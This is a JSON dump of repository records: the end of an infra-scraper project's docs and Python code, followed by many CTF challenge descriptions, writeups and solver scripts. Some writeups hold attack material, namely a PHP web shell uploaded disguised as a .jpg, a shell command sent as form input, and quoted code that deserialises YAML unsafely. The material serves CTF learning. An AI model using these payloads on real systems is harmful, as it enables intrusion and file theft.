curve, toward the polyline defined\nby the path via the inclusion edges from one node to another. This\nhierarchical bundling reduces visual clutter and also visualizes implicit\nadjacency edges between parent nodes that are the result of explicit adjacency\nedges between their respective child nodes. Furthermore, hierarchical edge\nbundling is a generic method which can be used in conjunction with existing\ntree visualization techniques.\n\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/hiearchical-edge-bundling.png\n :width: 100%\n :figclass: align-center\n\n Hierarchical edge bundling of SaltStack services and their relations (cca 100 nodes)\n\n\nMore Information\n================\n\n* http://www.win.tue.nl/vis1/home/dholten/papers/bundles_infovis.pdf\n* https://www.win.tue.nl/vis1/home/dholten/papers/forcebundles_eurovis.pdf\n" }, { "alpha_fraction": 0.6963021159172058, "alphanum_fraction": 0.6963021159172058, "avg_line_length": 22.962265014648438, "blob_id": "2af1fc87e146b4c0de88f4adc79d168edc7cd6f3", "content_id": "04cee5b8262ff1678e1dc4149786355948656d5b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1271, "license_type": "permissive", "max_line_length": 130, "num_lines": 53, "path": "/doc/source/text/app-config.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=============\nConfiguration\n=============\n\nYou provide one configuration file for all providers. 
The default location is\n``/etc/infra-scraper/config.yaml`` but it can be overriden by\n``INFRA_SCRAPER_CONFIG_PATH`` environmental variable, for example:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_PATH=~/scraper.yml\n\n\nConfiguration in ETCD\n=====================\n\nYou can use ETCD as a storage backend for the configuration and scrape results. Following environmental parameters need to be set:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_BACKEND=etcd\n export INFRA_SCRAPER_CONFIG_PATH=/service/scraper/config\n\n\nStorage Configuration\n=====================\n\nYou can set you local filesystem path where scraped data will be saved.\n\n.. code-block:: yaml\n\n storage:\n backend: localfs\n path: /tmp/scraper\n endpoints: {}\n\nYou can also set the scraping storage backend to use the ETCD service instead\nof a local filesystem backend.\n\n.. code-block:: yaml\n\n storage:\n backend: etcd\n path: /scraper\n endpoints: {}\n\n\nEndpoints Configuration\n=======================\n\nEach endpoint kind expects a little different set of configuration. Look at\nindividual chapters for samples of required parameters to setup individual\nendpoints.\n" }, { "alpha_fraction": 0.6885644793510437, "alphanum_fraction": 0.698296844959259, "avg_line_length": 24.625, "blob_id": "54538990a9db8f9ef09c223147233a165b265ee6", "content_id": "97899efd65ff6bacc3eefa78d85c2b9c8ffb5b00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 411, "license_type": "permissive", "max_line_length": 72, "num_lines": 16, "path": "/doc/source/text/input-openstack.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n================\nOpenStack Clouds\n================\n\nConfigurations for keystone v2 and keystone v3 clouds. Config for single\ntenant scraping.\n\n.. literalinclude:: ../static/config/config-openstack-project.yaml\n :language: yaml\n :emphasize-lines: 4\n\nConfig for scraping resources from entire cloud.\n\n.. literalinclude:: ../static/config/config-openstack-cloud.yaml\n :language: yaml\n :emphasize-lines: 4\n" }, { "alpha_fraction": 0.5658536553382874, "alphanum_fraction": 0.5707316994667053, "avg_line_length": 16, "blob_id": "ce5ba4db1ff5eb253b11331edf9eafd959c18722", "content_id": "0aad07a70d730b68afd40fb2ebc17cd3f629d16c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 205, "license_type": "permissive", "max_line_length": 23, "num_lines": 12, "path": "/doc/source/text/input-index.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n===================\nSupported Platforms\n===================\n\n.. 
toctree::\n :maxdepth: 2\n\n input-amazon.rst\n input-kubernetes.rst\n input-openstack.rst\n input-saltstack.rst\n input-terraform.rst\n" }, { "alpha_fraction": 0.5847670435905457, "alphanum_fraction": 0.5854838490486145, "avg_line_length": 39.72262954711914, "blob_id": "02f007b64acdafc5e814d6249646feeecd8b17cc", "content_id": "73650c1e151af0b63e7dd0c9f2056f16c61224f0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5580, "license_type": "permissive", "max_line_length": 99, "num_lines": 137, "path": "/infra_scraper/main.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport os\nimport importlib\nimport time\n\nfrom infra_scraper import constructors\nfrom infra_scraper import exceptions\nfrom infra_scraper.utils import load_yaml_json_file, setup_logger\n\nlogger = setup_logger(__name__)\n\nconfig_backend = os.environ.get('INFRA_SCRAPER_CONFIG_BACKEND',\n 'localfs')\nconfig_file = os.environ.get('INFRA_SCRAPER_CONFIG_PATH',\n '/etc/infra-scraper/config.yaml')\n\n\ndef _get_module(module_key):\n class_mapping = constructors.get_constructor_mapping()\n if module_key not in class_mapping:\n raise exceptions.InfraScraperException(\n \"Service {module_key} is unkown. Please pass in a client\"\n \" constructor or submit a patch to infra scraper\".format(\n module_key=module_key))\n mod_name, ctr_name = class_mapping[module_key].rsplit('.', 1)\n lib_name = mod_name.split('.')[0]\n try:\n mod = importlib.import_module(mod_name)\n except ImportError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but\"\n \" {mod_name} was unable to be imported. Either import\"\n \" the module yourself and pass the constructor in as an argument,\"\n \" or perhaps you do not have module {lib_name} installed.\".format(\n module_key=module_key,\n mod_name=mod_name,\n lib_name=lib_name))\n try:\n ctr = getattr(mod, ctr_name)\n except AttributeError:\n raise exceptions.InfraScraperException(\n \"Client for '{module_key}' was requested, but although\"\n \" {mod_name} imported fine, the constructor at {fullname}\"\n \" as not found.\".format(\n module_key=module_key,\n mod_name=mod_name,\n fullname=class_mapping[module_key]))\n return ctr\n\n\nclass InfraScraper(object):\n def __init__(self):\n self.config = self.get_global_config()\n storage_class = self.config.get('storage', {'backend': 'localfs'})\n self.storage = self._get_module('storage',\n storage_class['backend'],\n storage_class)\n\n def _get_module(self, module_file, module_key, module_init={}):\n module_class = _get_module(\"{}-{}\".format(\n module_file, module_key))\n return module_class(**module_init)\n\n def get_global_config(self):\n return load_yaml_json_file(config_file)\n\n def get_config(self, name):\n config = self.config['endpoints'][name]\n config['name'] = name\n return config\n\n def status(self):\n config = self.config\n for endpoint_name, endpoint in self.config['endpoints'].items():\n endpoint.pop('config')\n endpoint['status'] = self.get_endpoint_status(endpoint_name)\n return config\n\n def get_endpoint_status(self, name):\n try:\n data = self.get_cached_data(name, 'count')\n except Exception as e:\n logger.error('Cannot get last status for {}, with error {}.'.format(name, e))\n data = None\n return data\n\n def scrape_all_data_forever(self, interval):\n config = self.get_global_config()\n while True:\n for endpoint_name, endpoint in config['endpoints'].items():\n self.scrape_data(endpoint_name)\n 
time.sleep(config.get('scrape_interval', 60))\n\n def scrape_all_data(self):\n config = self.get_global_config()\n for endpoint_name, endpoint in config['endpoints'].items():\n if config.get('debug', False):\n return self.scrape_data(endpoint_name)\n try:\n self.scrape_data(endpoint_name)\n except Exception as e:\n logger.error('Scraping endpoint {} failed with error: {}'.format(endpoint_name, e))\n\n def scrape_data_forever(self, name, interval):\n config = self.get_global_config()\n sleep_interval = config.get('scrape_interval', interval)\n while True:\n self.scrape_data(name)\n logger.info('Sleeping for {} seconds.'.format(sleep_interval))\n time.sleep(sleep_interval)\n\n def scrape_data(self, name):\n config = self.get_config(name)\n self.input = self._get_module('input', config['kind'], config)\n self.out_count = self._get_module('output', 'count')\n self.out_vis = self._get_module('output', 'vis')\n self.out_vis_hier = self._get_module('output', 'vis-hier')\n logger.info('Scraping of {} started.'.format(name))\n self.input.scrape_all_resources()\n data = self.input.to_dict()\n self.storage.save_data(name, data.copy())\n self.storage.save_output_data(name, 'count',\n self.out_count.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis',\n self.out_vis.get_data('raw', data.copy()))\n self.storage.save_output_data(name, 'vis-hier',\n self.out_vis_hier.get_data('raw', data.copy()))\n logger.info('Scraping of {} completed.'.format(name))\n\n def get_cached_data(self, name, kind):\n storage = self._get_module('storage', 'file')\n data = storage.load_output_data(name, kind)\n return data\n\n def get_data(self, name, kind, format='raw'):\n self.output = self._get_module('output', kind)\n data = self.storage.load_data(name)\n return self.output.get_data(format, data)\n" } ]
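A minimal usage sketch of the `InfraScraper` entry points shown in `infra_scraper/main.py` above. The endpoint name `demo-cloud` is hypothetical; it must exist under `endpoints` in the configuration file described earlier, and a valid config is assumed at `INFRA_SCRAPER_CONFIG_PATH`.

```python
# Hedged sketch only: 'demo-cloud' is a made-up endpoint name.
from infra_scraper.main import InfraScraper

scraper = InfraScraper()
scraper.scrape_data('demo-cloud')  # one pass: input plugin -> storage + count/vis/vis-hier outputs
counts = scraper.get_cached_data('demo-cloud', 'count')  # read back the cached 'count' output
print(counts)
```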
47
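Editor's note on the `VisHierOutput._transform_openstack` method shown at the top of this section: `resources` is initialized empty and then iterated, so the method always emits an empty resource list. Below is a hedged reconstruction of the presumably intended population step, mirroring the flattening done in `_transform_default`; the `<kind>|<uid>` namespacing is a guess for illustration, not the project's confirmed scheme.

```python
# Assumed reconstruction -- the original never fills `resources` before
# iterating it. data['resources'] is {kind: {uid: item}} per BaseInput.
def _transform_openstack(self, data):
    resources = {}
    out_resources = []
    for kind, items in data['resources'].items():
        for uid, item in items.items():
            item.setdefault('relations', [])
            resources['{}|{}'.format(kind, uid)] = item
    for resource_name, resource_data in resources.items():
        out_resources.append({
            'name': resource_name,
            'size': 1,
            'relations': resource_data['relations'],
        })
    data['resources'] = out_resources
    data.pop('relations')
    data.pop('resource_types')
    return data
```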
security-notes/workspace
https://github.com/security-notes/workspace
a1dbfd005a73744d53ecae49364bd3db56f0fe1f
27ed56632bd6aa4af44e08fc3954351a275aba24
c5fb026780db7159db1c82292b67073c3b003367
refs/heads/dev
2023-07-16T01:09:26.779200
2021-08-14T04:48:04
2021-08-14T04:48:04
395,896,811
0
0
null
2021-08-14T05:06:53
2021-08-14T05:06:54
2021-08-14T05:09:31
null
[ { "alpha_fraction": 0.7665369510650635, "alphanum_fraction": 0.8093385100364685, "avg_line_length": 27.55555534362793, "blob_id": "6c04f4726614c067ef09808667e16ea01fc231df", "content_id": "a1b66beaee56ff3a15f131a89cefb2137845ab7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 377, "license_type": "no_license", "max_line_length": 107, "num_lines": 9, "path": "/2021/WaniCTF21-spring/Git_Master/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "https://hub.docker.com/r/wanictf21spring/nginx_on_ubuntu\n\nホームページをみんなで開発したいので、イメージを公開するです。\n\n昔、秘密の文字列をコミットしたことがあるけど大丈夫だよね...?\n\n[mis-git-master.zip](https://score.wanictf.org/storage/s3qxpo5tonj4uvujrlq5sal9hd8alowg/mis-git-master.zip)\n\nWriter : okmt, hi120ki\n" }, { "alpha_fraction": 0.5976190567016602, "alphanum_fraction": 0.7476190328598022, "avg_line_length": 23.705883026123047, "blob_id": "43b691544165258f6f5eb6dbf653c06ed0a3f1ae", "content_id": "ae4bf46c0cd38e240ddb1a6320795c82d955e115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 476, "license_type": "no_license", "max_line_length": 213, "num_lines": 17, "path": "/2021/BCACTF_2.0/Storytime_The_Opening_Gambit/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file story\nstory: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ccea544c84172f60a939819e4416fdd108982090, for GNU/Linux 3.2.0, not stripped\n```\n\nstringsコマンドでフラグが見つかった。\n\n```bash\n$ strings story | grep bcactf\nbcactf{w0ol_m4k3s_str1ng_ziv4mk3ca91b}\n```\n\n<!-- bcactf{w0ol_m4k3s_str1ng_ziv4mk3ca91b} -->\n" }, { "alpha_fraction": 0.48163264989852905, "alphanum_fraction": 0.6122449040412903, "avg_line_length": 29.75, "blob_id": "d4f94c91fecf891e68dc516891c848c760b9f430", "content_id": "2ef2560ff2a1e437bdd220cecae84243bce50ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 66, "num_lines": 8, "path": "/2021/UMassCTF_2021/PikCha/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\n\ndata = {'guess':'find . 
-name *'}\nwith requests.Session() as session:\n r = session.get(\"http://104.197.195.221:8084/\")\n for _ in range(500):\n r = session.post(\"http://104.197.195.221:8084/\",data=data)\n print(r.text)" }, { "alpha_fraction": 0.48188406229019165, "alphanum_fraction": 0.5181159377098083, "avg_line_length": 20.30769157409668, "blob_id": "d777ac00107429d164b079f8a596ee9f29b8adb4", "content_id": "5fb2974fcd2f38ab71b8ba67604d8beaa9904783", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 43, "num_lines": 13, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\n\ntext = open('zwsp.txt','rb').read()\n\nbinary = ''\nfor i,t in enumerate(text):\n if(t == 0xe2):\n if(text[i:i+3] == b'\\xe2\\x80\\x8b'):\n binary += '0'\n else:\n binary += '1'\n\nprint(long_to_bytes(int(binary,2)))" }, { "alpha_fraction": 0.6360294222831726, "alphanum_fraction": 0.7904411554336548, "avg_line_length": 37.85714340209961, "blob_id": "fae3f7850c4eeab20b1ca49c8dc225d60962c7f1", "content_id": "a6f072b3d258bf0431f5e907bf750f637279dfd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 272, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/2021/UIUCTF_2021/back_to_basics/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Shoutout to those people who think that base64 is proper encryption\n\n**author**: epistemologist\n\n[main.py](https://uiuc.tf/files/7c9e0cac76b48d1605b4b3e1b6417877/main.py?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE2fQ.YQWOYQ.s1trughJs9laAJn66SnfKaLfVvE)\n\n[flag_enc](https://uiuc.tf/files/7d9891aa7bed8a839c3379ebc3194a4a/flag_enc?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE3fQ.YQWOYQ.exI2pjzAKHhN-Efc7n3_THTLYZI)\n" }, { "alpha_fraction": 0.3641851246356964, "alphanum_fraction": 0.38430583477020264, "avg_line_length": 21.636363983154297, "blob_id": "04001a34759703496402c520b08d38de7fd2ca31", "content_id": "5aa3e38189d1fdb5467a0382cd17a36a1563b791", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/2020/WaniCTF/logged_flag/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import re\n\ncmd = ''\n\nwith open('./key_log.txt') as f:\n for _ in range(317):\n line = f.readline()\n key = re.findall(r'(?<=\\[).+?(?=\\])',line)\n if len(key) == 0:\n continue\n if key[0] == 'Enter':\n cmd += '\\n'\n elif key[0] == 'Shift':\n continue\n elif key[0] == 'Space':\n cmd += ' '\n elif key[0] == 'BackSpace':\n cmd = cmd[:-1]\n else:\n cmd += key[0].lower()\n \n print(cmd)" }, { "alpha_fraction": 0.8488371968269348, "alphanum_fraction": 0.8720930218696594, "avg_line_length": 16.399999618530273, "blob_id": "114b0dee5b564c69a0f183e7c191f5545cac5998", "content_id": "1deddc7ecc9df83634f0185449ce7781e487bbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 178, "license_type": "no_license", "max_line_length": 34, "num_lines": 5, "path": "/2020/WaniCTF/ALLIGATOR_02/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": 
"コマンドプロンプトの実行履歴からFLAGを見つけてください。\n\n(ALLIGATOR_01で配布されているファイルを使ってください)\n\nWriter : takushooo" }, { "alpha_fraction": 0.6798029541969299, "alphanum_fraction": 0.7241379022598267, "avg_line_length": 17.454545974731445, "blob_id": "a3d2b9a8f2062df358ceebff9d5e8b048b55ca8c", "content_id": "567e2808c65abbec918cca4fb984c7b00453a99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 89, "num_lines": 11, "path": "/2021/BCACTF_2.0/Home_Automation/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Check out my super secure home automation system! No, don't try turning the lights off...\n\nhttp://web.bcactf.com:49155/\n\nHint 1 of 2\n\nHow do websites know who you are?\n\nHint 2 of 2\n\nWhat's on the table?\n" }, { "alpha_fraction": 0.4522292912006378, "alphanum_fraction": 0.7261146306991577, "avg_line_length": 18.625, "blob_id": "34571e751d1f9ec08a7fafe8ba683d8db096ad69", "content_id": "03825e346e2fab95fa8f44b848f9b0d8624914f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 314, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/2021/redpwnCTF_2021/baby/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "n = 228430203128652625114739053365339856393\ne = 65537\nc = 126721104148692049427127809839057445790\n\nfrom factordb.factordb import FactorDB\nfrom Crypto.Util.number import *\n\nf = FactorDB(n)\nf.connect()\nfactors = f.get_factor_list()\n\n[p, q] = factors\nd = pow(e,-1,(p-1)*(q-1))\nm = pow(c,d,n)\n\nprint(long_to_bytes(m))\n" }, { "alpha_fraction": 0.7283105254173279, "alphanum_fraction": 0.7922374606132507, "avg_line_length": 47.77777862548828, "blob_id": "9d6e85b26b3725068afd3308cc4e637d5ae6d9ba", "content_id": "0b258002627469f7e891331588af8276155e2845", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 438, "license_type": "no_license", "max_line_length": 219, "num_lines": 9, "path": "/2020/pbctf_2020/Queensarah2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The secret mainframe for a distributed hacker group has been discovered. We have managed to exfiltrate some of the code that it runs, but we don't have a physical copy of their access badges. 
Can you still get the flag?\n\nRemote: `nc queensarah2.chal.perfect.blue 1`\n\nNote: enter flag as `pbctf{lower_case_flag_text}`\n\nBy: UnblvR\n\n[challenge.py](https://storage.googleapis.com/pbctf-2020-ctfd/d85406864a9da1d7ea007ad585c20685/challenge.py)" }, { "alpha_fraction": 0.6885964870452881, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 19.727272033691406, "blob_id": "d71646c4f3a6c634d5408f78986f0c74edc6ab9a", "content_id": "f658b19731d28535fbb5a69fbae625516ccf96d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 228, "license_type": "no_license", "max_line_length": 125, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Imaginary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWhat's ImaginaryCTF without good old sqrt(-1)?\n\n**Attachments**\n\n[https://imaginaryctf.org/r/CE4D-imaginary.py](https://imaginaryctf.org/r/CE4D-imaginary.py) `nc chal.imaginaryctf.org 42015`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.5504424571990967, "alphanum_fraction": 0.6159291863441467, "avg_line_length": 15.647058486938477, "blob_id": "334c04cbc5a69e79598b88d16b2033f94a84002a", "content_id": "3999a0068c7a588ae7cd89ac7e23343a1fd2c124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 791, "license_type": "no_license", "max_line_length": 43, "num_lines": 34, "path": "/2020/WaniCTF/Find_a_Number/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nサーバーで生成された`0~500000` のランダムな値を当てればフラグが得られそう。\n\n間違えたときに、大きいか小さいかの情報が得られるので二分探索で絞り込んでいく。\n\n20回トライでき、`2^20 > 500000` なので確実に特定できる。\n\n以下のプログラムを実行するとフラグが得られる。\n\n```py\nfrom pwn import *\n\nconn = remote('number.wanictf.org',60000)\nn_min, n_max = 0, 500000\n\nwhile True:\n\n conn.recvuntil('input:')\n mid = (n_min + n_max) // 2\n conn.sendline(str(mid))\n\n msg = str(conn.recvlines(2))\n\n if 'small' in msg:\n n_min = mid\n elif 'big' in msg:\n n_max = mid\n else:\n print(msg)\n break\n```\n\n<!-- FLAG{b1n@ry_5e@rch_1s_v3ry_f@5t} -->" }, { "alpha_fraction": 0.7425373196601868, "alphanum_fraction": 0.766791045665741, "avg_line_length": 30.58823585510254, "blob_id": "cefc6c48971f29d9f79d8b854f676f6c8bef7ac0", "content_id": "6cf6ff2d928142c9b2aa6b7475bba5de5a1f9c01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 536, "license_type": "no_license", "max_line_length": 135, "num_lines": 17, "path": "/2021/BCACTF_2.0/Honors_ABCs/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Here at BCA, we don't deal with normal classes. Everything is at the honors level or above! Let's start by learning about the alphabet.\n\nAnd by learning, we obviously mean testing. Don't cheat!\n\n[honors-abcs.c](https://objects.bcactf.com/bcactf2/honors-abcs/honors-abcs.c)\n\n[honors-abcs](https://objects.bcactf.com/bcactf2/honors-abcs/honors-abcs)\n\n`nc bin.bcactf.com 49155`\n\nHint 1 of 2\n\nThe response variable is only 50 characters long. What happens if you ignore that?\n\nHint 2 of 2\n\nTry compiling the program. Are there any warnings?" 
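The Honors_ABCs hints above point at overflowing the 50-character `response` buffer. A hedged first-probe sketch with pwntools follows; the binary's stack layout and any exact offset are unknown here, so this only demonstrates the oversized send the hints suggest.

```python
# Probe only: send more than the 50-byte buffer holds and inspect the output.
# Offsets and any payload beyond this would require the binary's layout.
from pwn import remote

io = remote('bin.bcactf.com', 49155)
io.sendline(b'A' * 200)
print(io.recvall(timeout=3).decode(errors='replace'))
```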
}, { "alpha_fraction": 0.7516778707504272, "alphanum_fraction": 0.8255033493041992, "avg_line_length": 29, "blob_id": "a0846b854652f0032cad4773a25658d35e7641f3", "content_id": "77f8b07adde8e7441a87e6d453cd9a32eee7cdaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 169, "license_type": "no_license", "max_line_length": 121, "num_lines": 5, "path": "/2021/WaniCTF21-spring/Simple_conversion/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "戻し方を忘れました…\n\n[cry-simple-conversion.zip](https://score.wanictf.org/storage/rd6uex6si8ovnzjh6djzv794q80lb7u9/cry-simple-conversion.zip)\n\nWriter : Laika" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 9, "blob_id": "94364dfc93e95d63d20015cd26328cb89cad657a", "content_id": "c9e3e854f320f4d4e05f0ab6f557b75813ca1138", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 30, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/2021/redpwnCTF_2021/compliant-lattice-feline/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "get a flag!\n\n`nc mc.ax 31443`\n" }, { "alpha_fraction": 0.6625766754150391, "alphanum_fraction": 0.8343558311462402, "avg_line_length": 53.33333206176758, "blob_id": "c77519bc7655a83f89a4206d95c2984cfa5ef5aa", "content_id": "673fb39b167ac0fe1cc64a731bee6163e388e397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 163, "license_type": "no_license", "max_line_length": 114, "num_lines": 3, "path": "/2021/RaRCTF_2021/verybabyrev/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "fun fact: verybabyrev backwards is verybabyrev\n\n[verybabyrev - ad2b44](https://files-ctf.rars.win/challenge-files/52/ad2b443030c035d29e900d64e61b8520/verybabyrev)\n" }, { "alpha_fraction": 0.5609756112098694, "alphanum_fraction": 0.6747967600822449, "avg_line_length": 16.619047164916992, "blob_id": "018a473693616b9b392e96fc9004ebee5b635027", "content_id": "ffeca8dadf0e06c4d5a162a17e383d2d4f3cf127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 541, "license_type": "no_license", "max_line_length": 63, "num_lines": 21, "path": "/2021/UMassCTF_2021/Hermit_Part_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nページにアクセスすると、ファイルアップロードの画面が表示される。\n\n![](img/2021-03-27-16-38-37.png)\n\n特定の画像ファイルしかアップロードできないが、`.jpg`という拡張子のファイルにPHPコードを書くと実行させることができる。\n\n```php\n<?php \nsystem(\"find / -name *flag*\");\necho \"<br>\";\nsystem(\"cat /home/hermit/userflag.txt\");\n?>\n```\n\n![](img/2021-03-27-16-39-00.png)\n\n![](img/2021-03-27-16-40-11.png)\n\n<!-- UMASS{a_picture_paints_a_thousand_shells} -->" }, { "alpha_fraction": 0.760765552520752, "alphanum_fraction": 0.7942583560943604, "avg_line_length": 41, "blob_id": "0430308b16c623b2f3e2ebef3e229de9d7af02eb", "content_id": "6cce65c2ea21af776a5c984ed46f2f5420c6932c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 210, "license_type": "no_license", "max_line_length": 115, "num_lines": 5, "path": "/2021/angstromCTF_2021/Archaic/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "The archaeological team at ångstromCTF has uncovered an archive from over 100 years ago! 
Can you read the contents?\n\nAccess the file at `/problems/2021/archaic/archive.tar.gz` on the shell server.\n\nAuthor: kmh" }, { "alpha_fraction": 0.6378591060638428, "alphanum_fraction": 0.6723818182945251, "avg_line_length": 27.556291580200195, "blob_id": "1515b2341fa2a394113149cf048978a4ba0ea24b", "content_id": "cab2d1c302cb9511d6258685370e5eb7931562cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5092, "license_type": "no_license", "max_line_length": 214, "num_lines": 151, "path": "/2020/CyberSecurityRumble2020/Wheels_n_Whales/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\nhttp://chal.cybersecurityrumble.de:7780 にアクセス。\n\n![](img/2020-10-31-17-15-23.png)\n\n![](img/2020-10-31-17-14-00.png)\n\n入力欄があって、[submit] を押すと入力した内容と画像が表示される。\n\n![](img/2020-10-31-17-14-54.png)\n\n\n```py\nimport yaml\nfrom flask import redirect, Flask, render_template, request, abort\nfrom flask import url_for, send_from_directory, make_response, Response\nimport flag\n\napp = Flask(__name__)\n\nEASTER_WHALE = {\"name\": \"TheBestWhaleIsAWhaleEveryOneLikes\", \"image_num\": 2, \"weight\": 34}\n\[email protected](\"/\")\ndef index():\n return render_template(\"index.html.jinja\", active=\"home\")\n\n\nclass Whale:\n def __init__(self, name, image_num, weight):\n self.name = name\n self.image_num = image_num\n self.weight = weight\n \n def dump(self):\n return yaml.dump(self.__dict__)\n\n\[email protected](\"/whale\", methods=[\"GET\", \"POST\"])\ndef whale():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n if len(name) > 10: \n return make_response(\"Name to long. Whales can only understand names up to 10 chars\", 400)\n image_num = request.form[\"image_num\"]\n weight = request.form[\"weight\"]\n whale = Whale(name, image_num, weight)\n if whale.__dict__ == EASTER_WHALE:\n return make_response(flag.get_flag(), 200) # ★\n return make_response(render_template(\"whale.html.jinja\", w=whale, active=\"whale\"), 200)\n return make_response(render_template(\"whale_builder.html.jinja\", active=\"whale\"), 200)\n\n\nclass Wheel:\n def __init__(self, name, image_num, diameter):\n self.name = name\n self.image_num = image_num\n self.diameter = diameter\n\n @staticmethod\n def from_configuration(config):\n return Wheel(**yaml.load(config, Loader=yaml.Loader))\n \n def dump(self):\n return yaml.dump(self.__dict__)\n\n\[email protected](\"/wheel\", methods=[\"GET\", \"POST\"])\ndef wheel():\n if request.method == \"POST\":\n if \"config\" in request.form:\n wheel = Wheel.from_configuration(request.form[\"config\"])\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n name = request.form[\"name\"]\n image_num = request.form[\"image_num\"]\n diameter = request.form[\"diameter\"]\n wheel = Wheel(name, image_num, diameter)\n print(wheel.dump())\n return make_response(render_template(\"wheel.html.jinja\", w=wheel, active=\"wheel\"), 200)\n return make_response(render_template(\"wheel_builder.html.jinja\", active=\"wheel\"), 200)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n\n```\n\n★を実行できればフラグが得られそう。\n\nただし、`name`が長いので普通に入力しても、\n\n```py\nif len(name) > 10: \n return make_response(\"Name to long. 
